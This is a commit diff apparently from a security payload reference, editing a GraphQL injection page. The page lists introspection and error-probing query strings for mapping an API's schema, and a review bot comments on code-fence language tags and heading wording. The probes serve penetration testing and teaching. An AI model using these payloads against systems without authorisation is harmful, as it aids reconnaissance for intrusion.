Command injection rewritten

Swissky
2019-04-21 19:50:50 +02:00
parent 81f93a19c2
commit 4d3ee90eec
6 changed files with 78 additions and 38 deletions

@@ -1,17 +1,17 @@
# GraphQL injection
GraphQL is a query language for APIs and a runtime for fulfilling those queries with existing data.
> GraphQL is a query language for APIs and a runtime for fulfilling those queries with existing data.
## Exploit
Identify an injection point
```
```javascript
?param={__schema{types{name}}}
```
Check if errors are visible
```
```javascript
?param={__schema}
?param={}
?param={thisdefinitelydoesnotexist}
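Review bot: the `javascript` tag added to both fences in this hunk does not match their content. The `?param={__schema{types{name}}}` and `?param={thisdefinitelydoesnotexist}` lines are URL query parameters carrying GraphQL, not JavaScript, so a highlighter will colour them misleadingly. Tag these fences `graphql`, or leave them untagged as before. Separately, the description line is now a `>` blockquote with no source given. If it is a quotation, add the attribution. If not, keep it as a plain paragraph.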
@@ -19,7 +19,7 @@ Check if errors are visible
Enumerate Database Schema with the following GraphQL query
```
```javascript
fragment FullType on __Type {
kind
name
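Review bot: the context line above this fence says "Enumerate Database Schema", but the query that follows starts with `fragment FullType on __Type`, which introspects the GraphQL API schema (types and fields), not a database. Since this block is being touched anyway, reword the heading to something like "Enumerate the GraphQL schema" so readers do not conflate the two. The fence language would also be more accurate as `graphql`.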
@@ -119,7 +119,7 @@ query IntrospectionQuery {
Enumerate the definition of interesting types using the following GraphQL query, replacing "User" with the chosen type
```
```javascript
{__type (name: "User") {name fields{name type{name kind ofType{name kind}}}}}
```
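Review bot: the query in this fence is packed onto one line, `{__type (name: "User") {name fields{...}}}`, with a stray space between `__type` and its argument list, which makes the nested `type{name kind ofType{name kind}}` selection hard to read. Consider breaking it across lines, one field per line, in the same layout as the `fragment FullType on __Type` block, and dropping the space before `(`.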